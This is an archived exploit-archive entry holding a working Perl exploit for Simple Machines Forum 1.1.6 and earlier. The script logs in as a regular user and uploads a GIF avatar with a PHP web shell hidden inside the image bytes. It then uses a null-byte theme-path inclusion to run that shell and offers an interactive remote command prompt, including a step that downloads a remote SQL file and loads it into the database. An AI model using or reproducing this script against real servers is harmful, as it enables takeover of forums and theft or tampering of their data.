smf-lfiexec.txt

2008-11-06T00:00:00
ID PACKETSTORM:71629
Type packetstorm
Reporter ~elmysterio
Modified 2008-11-06T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# @title: Simple Machines Forum Code Execution  
# @versn: * <= 1.1.6  
# @authr: ~elmysterio ( a.k.a us )  
# @stats: DROPPED!!!!!!!  
# @descp: In loving memory of the rare bone marrow disease that killed rgod.   
# We can't thank you enough for killing a bug killer.   
# @bug : Sources/QueryString.php & Sources/Themes.php w/ magic_quotes == Off  
# @gr33t: m0rt's failure, it never stops.  
#   
# C:\Documents and Settings\molest>perl P:\advisories\smf\smf_localfileinclude.pl  
# -s http://localhost/audit/smf116 -u regular -p test -d  
# [ii] 0day Simple Machines Forum <= 1.1.6 Code Execution  
# [ii] Session ID = e6abb52c4dc7fd4ecd7b307f66e9cd9d  
# [ii] User Id = 2  
# [ii] Uploaded a shell...  
# [cmd@win32]$ ver  
#   
# Microsoft Windows XP [Version 5.1.2600]  
#   
# [cmd@win32]$  
#  
# FOR LULZ PURPOSE ONLY!!  
#  
use strict;  
use warnings;  
use LWP::UserAgent;  
use HTTP::Request::Common;  
use Getopt::Long qw(:config no_ignore_case);  
  
print "[ii] 0day Simple Machines Forum <= 1.1.6 Code Execution\n";  
  
my $ua = LWP::UserAgent->new( cookie_jar => {}, agent => "Mozilla FireFox" );  
my %parms = ( s => "",  
d => 0,  
x => sub { print "[**] Proxy found, using $_[1]\n"; $ua->proxy(['http'], $_[1]); },  
u => "Gl0ria!!!",  
p => "gl0ria\@herb3st" );  
  
GetOptions \%parms, "s=s", "d", "x=s", "u=s", "p=s";   
  
if( !$parms{s} ) {  
die <<HELP  
[ii] usage: $0 <parms>  
[-s] Site -> http://site.com/forums  
[-x] Proxy -> localhost:8118  
[-u] Username -> Gl0ria!!!  
[-p] Password -> gl0ria\@herb3st  
[-d] Debug  
HELP  
}  
  
my $shell = chr(0x47).chr(0x49).chr(0x46).chr(0x38).chr(0x39).chr(0x61).  
chr(0x01).chr(0x00).chr(0x01).chr(0x00).chr(0xf7).chr(0x00).  
chr(0x00).chr(0xa4).chr(0xb6).chr(0xa4).chr(0x16).chr(0x00).  
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0x6b).chr(0x00).chr(0x4c).chr(0x15).chr(0x00).  
chr(0x00).chr(0xf4).chr(0x00).chr(0x69).chr(0x77).chr(0x00).   
chr(0x00).chr(0xf8).chr(0x00).chr(0x6e).chr(0x62).chr(0x00).  
chr(0x00).chr(0x15).chr(0x00).chr(0x67).chr(0x00).chr(0x00).  
chr(0x00).chr(0x34).chr(0x00).chr(0x75).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x61).chr(0xc0).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x89).chr(0x00).chr(0x00).chr(0x1c).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0xa9).chr(0x00).chr(0x00).chr(0x20).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x6f).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x56).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00); $shell .= <<'EXIF';  
<?php   
error_reporting(0);ini_set('max_execution_time',0);  
$x=trim(stripslashes($_SERVER[HTTP_SERVER_INFO]));$z=(ini_get('safe_mode') or strpos(ini_get('disable_functions'),'passthru') ? '1' : '0');  
if($x=='0998'){print '---info---'.PHP_OS.';'.$z.'---info---';exit;}  
print '---1243---';if($z){print eval($x);}else{print passthru($x);}print '---3421---';exit;   
?>  
EXIF  
$shell .= chr(0x38).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).  
chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x98).chr(0x01).chr(0x00).  
chr(0xcc).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).  
chr(0x00).chr(0x58).chr(0x00).chr(0x10).chr(0xe6).chr(0x00).  
chr(0x04).chr(0x12).chr(0x00).chr(0x10).chr(0x00).chr(0x00).  
chr(0x04).chr(0x05).chr(0x00).chr(0x01).chr(0x90).chr(0x00).  
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0xc8).chr(0x00).chr(0x10).chr(0xd5).chr(0x00).  
chr(0xe8).chr(0xf5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).  
chr(0x00).chr(0xff).chr(0x00).chr(0x13).chr(0xff).chr(0x00).  
chr(0x6c).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).  
chr(0x74).chr(0x6a).chr(0x00).chr(0x03).chr(0x16).chr(0x00).  
chr(0x00).chr(0xf4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0xc4).chr(0x00).chr(0x30).chr(0x1e).chr(0x00).  
chr(0x75).chr(0xe5).chr(0x00).chr(0x15).chr(0x77).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x15).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0xdc).chr(0x00).chr(0x00).  
chr(0xe7).chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).  
chr(0x00).chr(0x70).chr(0x00).chr(0x01).chr(0x59).chr(0x00).  
chr(0x00).chr(0x18).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x04).chr(0x00).chr(0x88).chr(0x01).chr(0x00).  
chr(0xe8).chr(0x05).chr(0x00).chr(0x12).chr(0x01).chr(0x00).  
chr(0x00).chr(0x6c).chr(0x00).chr(0x04).chr(0xe3).chr(0x00).  
chr(0x42).chr(0x12).chr(0x00).chr(0x6e).chr(0x00).chr(0x00).  
chr(0x74).chr(0x7e).chr(0x00).chr(0x30).chr(0x00).chr(0x00).  
chr(0x87).chr(0x00).chr(0x00).chr(0x6e).chr(0xc0).chr(0x00).  
chr(0x74).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).  
chr(0xff).chr(0x00).chr(0x00).chr(0xff).chr(0x00).chr(0x00).  
chr(0xff).chr(0xff).chr(0x00).chr(0xd6).chr(0xff).chr(0x00).  
chr(0x32).chr(0xff).chr(0x00).chr(0x6e).chr(0xff).chr(0x00).  
chr(0x74).chr(0xff).chr(0x00).chr(0x6c).chr(0xff).chr(0x00).  
chr(0x5b).chr(0xff).chr(0x00).chr(0xe5).chr(0xff).chr(0x00).  
chr(0x77).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).  
chr(0x15).chr(0x00).chr(0x00).chr(0x53).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x07).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x6b).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x58).chr(0x00).chr(0x00).chr(0x03).chr(0x00).  
chr(0xf0).chr(0x00).chr(0x00).chr(0x15).chr(0x00).chr(0x00).  
chr(0x00).chr(0x06).chr(0x00).chr(0x00).chr(0xf6).chr(0x00).  
chr(0x00).chr(0xe4).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0x0f).chr(0x00).chr(0x00).chr(0x1e).chr(0x00).  
chr(0x00).chr(0xe5).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0xf8).chr(0x74).chr(0x00).chr(0x62).chr(0xe7).  
chr(0x00).chr(0x01).chr(0x12).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0xc8).chr(0x68).chr(0x00).chr(0x28).  
chr(0x32).chr(0x15).chr(0xe5).chr(0xe6).chr(0x00).chr(0x77).  
chr(0x77).chr(0xa4).chr(0x00).chr(0xff).chr(0xe5).chr(0x00).  
chr(0xff).chr(0x12).chr(0x00).chr(0xff).chr(0x00).chr(0x00).  
chr(0xff).chr(0x00).chr(0x00).chr(0x6c).chr(0x00).chr(0x00).  
chr(0x5b).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).  
chr(0x77).chr(0xfc).chr(0xf8).chr(0x36).chr(0xf7).chr(0x62).  
chr(0x00).chr(0x12).chr(0x15).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x05).chr(0x00).chr(0x36).chr(0x90).chr(0x01).  
chr(0x00).chr(0xf6).chr(0x00).chr(0x00).chr(0x77).chr(0x00).  
chr(0x00).chr(0xc8).chr(0x04).chr(0xd8).chr(0xd5).chr(0x29).  
chr(0xed).chr(0xf5).chr(0xe5).chr(0x12).chr(0x77).chr(0x77).  
chr(0x00).chr(0xff).chr(0x94).chr(0xff).chr(0xff).chr(0xe7).  
chr(0xff).chr(0xff).chr(0x12).chr(0xff).chr(0xff).chr(0x00).  
chr(0xff).chr(0x6a).chr(0x64).chr(0x00).chr(0x16).chr(0x2f).  
chr(0x00).chr(0xf4).chr(0xe6).chr(0x00).chr(0x77).chr(0x77).  
chr(0x00).chr(0xe0).chr(0x00).chr(0x9c).chr(0x18).chr(0x00).  
chr(0xe8).chr(0xe5).chr(0x00).chr(0x12).chr(0x77).chr(0x00).  
chr(0x00).chr(0x00).chr(0xff).chr(0x4e).chr(0x00).chr(0xff).  
chr(0x21).chr(0x15).chr(0xff).chr(0x4c).chr(0x00).chr(0xff).  
chr(0x00).chr(0x00).chr(0x6f).chr(0x7c).chr(0x00).chr(0x10).  
chr(0xe8).chr(0x00).chr(0xe5).chr(0x12).chr(0x00).chr(0x77).  
chr(0x00).chr(0xf8).chr(0x00).chr(0x7b).chr(0x62).chr(0x00).  
chr(0xe0).chr(0x15).chr(0x00).chr(0x4e).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x98).chr(0xb0).chr(0x01).chr(0xe8).  
chr(0xe8).chr(0x00).chr(0x12).chr(0x12).chr(0x00).chr(0x00).  
chr(0x00).chr(0x64).chr(0x98).chr(0x6f).chr(0x2f).chr(0x10).  
chr(0x10).chr(0xe6).chr(0xe5).chr(0xe5).chr(0x77).chr(0x77).  
chr(0x77).chr(0x00).chr(0x10).chr(0x52).chr(0x00).chr(0xe4).  
chr(0xe9).chr(0x00).chr(0x4e).chr(0x12).chr(0x00).chr(0x00).  
chr(0x00).chr(0x61).chr(0x20).chr(0xc8).chr(0x00).chr(0x02).  
chr(0xff).chr(0x6c).chr(0x4f).chr(0xff).chr(0x00).chr(0x00).  
chr(0x7f).chr(0x69).chr(0x00).chr(0x1c).chr(0x00).chr(0x01).  
chr(0xe9).chr(0x61).chr(0x00).chr(0x12).chr(0x00).chr(0x00).  
chr(0x00).chr(0x29).chr(0x94).chr(0x00).chr(0x00).chr(0xe7).  
chr(0x00).chr(0x00).chr(0x12).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x6f).chr(0x00).chr(0x01).  
chr(0x10).chr(0x00).chr(0x00).chr(0xe5).chr(0x00).chr(0x00).  
chr(0x77).chr(0x00).chr(0xa0).chr(0x00).chr(0x00).chr(0x3a).  
chr(0x00).chr(0x00).chr(0x50).chr(0x00).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x30).  
chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x00).chr(0x69).  
chr(0x00).chr(0x00).chr(0x61).chr(0x60).chr(0x00).chr(0x74).  
chr(0xf1).chr(0x00).chr(0x74).chr(0x15).chr(0x00).chr(0x69).  
chr(0x00).chr(0x00).chr(0x00).chr(0xf0).chr(0x00).chr(0x00).  
chr(0xaa).chr(0x00).chr(0x02).chr(0x47).chr(0x00).chr(0x00).  
chr(0x00).chr(0x21).chr(0xf9).chr(0x04).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x00).chr(0x2c).chr(0x00).chr(0x00).  
chr(0x00).chr(0x00).chr(0x01).chr(0x00).chr(0x01).chr(0x00).  
chr(0x07).chr(0x08).chr(0x04).chr(0x00).chr(0x01).chr(0x04).  
chr(0x04).chr(0x00).chr(0x3b).chr(0x00);  
  
## Logging in  
my $ret = $ua->post("$parms{s}/index.php?action=login2",  
[  
user => $parms{u},  
passwrd => $parms{p},  
cookielength => -1  
]);  
  
## Getting id, sid and checking to see if we're logged on  
$ret = $ua->get("$parms{s}/index.php?action=profile");  
  
die "[!!] Wrong username/password\n"  
unless $ret->as_string !~ /The user whose profile you are trying to view does not exist/;  
  
die "[!!] Error getting session id\n"  
unless my($sid) = $ret->as_string =~ /sesc=([a-z0-9]{32})/;  
  
die "[!!] Error getting id\n"  
unless my($id) = $ret->as_string =~ /u=(\d+);/;  
  
print "[ii] Session ID = $sid\n".  
"[ii] User Id = $id\n" if $parms{d};  
  
## Checking for shell  
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => "echo expl0ited");  
  
&shell  
if $ret->as_string =~ /expl0ited/;  
  
$ret = $ua->request(   
POST "$parms{s}/index.php?action=profile2",  
Content_Type => 'multipart/form-data',  
Content =>  
[  
avatar_choice => "upload",  
sc => $sid,  
userID => $id,  
sa => "forumProfile",  
attachment =>  
[  
undef,  
"expl0ited.gif",  
Content => $shell,  
"Content-Type" => "image/gif"  
]  
]);  
  
## Updating Settings.php  
$ret = $ua->get("$parms{s}/index.php?action=jsoption;sesc=${sid};th=32;var=theme_dir;val=./attachments/avatar_${id}.gif\%2500");  
  
print "[ii] Uploaded a shell...\n"  
if $parms{d};  
  
shell();  
  
## lulz @ this shit.  
sub shell {  
my ($full,$base,$user,$pass,$file,$cmd,$os,$sh);  
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => '0998' );  
($os,$sh) = $ret->as_string =~ /---info---(.*?);(\d?)---info---/s;  
  
die "[!!] magic_quotes is turned on\n"  
if (not defined $os or not defined $sh or $1 eq $id);  
  
$sh = $sh ? "php" : "cmd";  
$os = $os =~ /win/i ? "win32" : "unix";  
  
do {  
print "[$sh\@$os]\$ ";  
$cmd = chomp (my $cmd = <STDIN>);  
  
  
exit  
unless $cmd !~ /^exit$/i;  
  
if( ($file) = $cmd =~ /^savefile (.*?) / ) {  
$cmd =~ s/savefile $1 //;  
} else { undef $file; }  
  
if( ($user,$pass,$full) = $cmd =~ /^mysql (.*?) (.*?) (.*?)$/ ) {  
($base) = $full =~ /\/(.*?)$/;  
$cmd = "cd attachments;wget $full; mysql --user=$user --password=$pass < $base; rm $base;";  
}  
  
$ret = $ua->get("$parms{s}/index.php?action=theme;sa=pick;u=${id};sesc=${sid}", SERVER_INFO => $cmd);  
$ret->as_string =~ /---1243---(.*?)---3421---/s;  
print "$1\n";  
  
if( defined $file ) {  
open FILE, ">>", $file or die "[!!] Error writing to file; $!\n";  
print FILE "Command Executed: $cmd\n".  
"Host: $parms{s}\n$1\n";  
close FILE;  
}  
} while( $cmd !~ /^exit$/i );  
  
exit;  
}  
  
`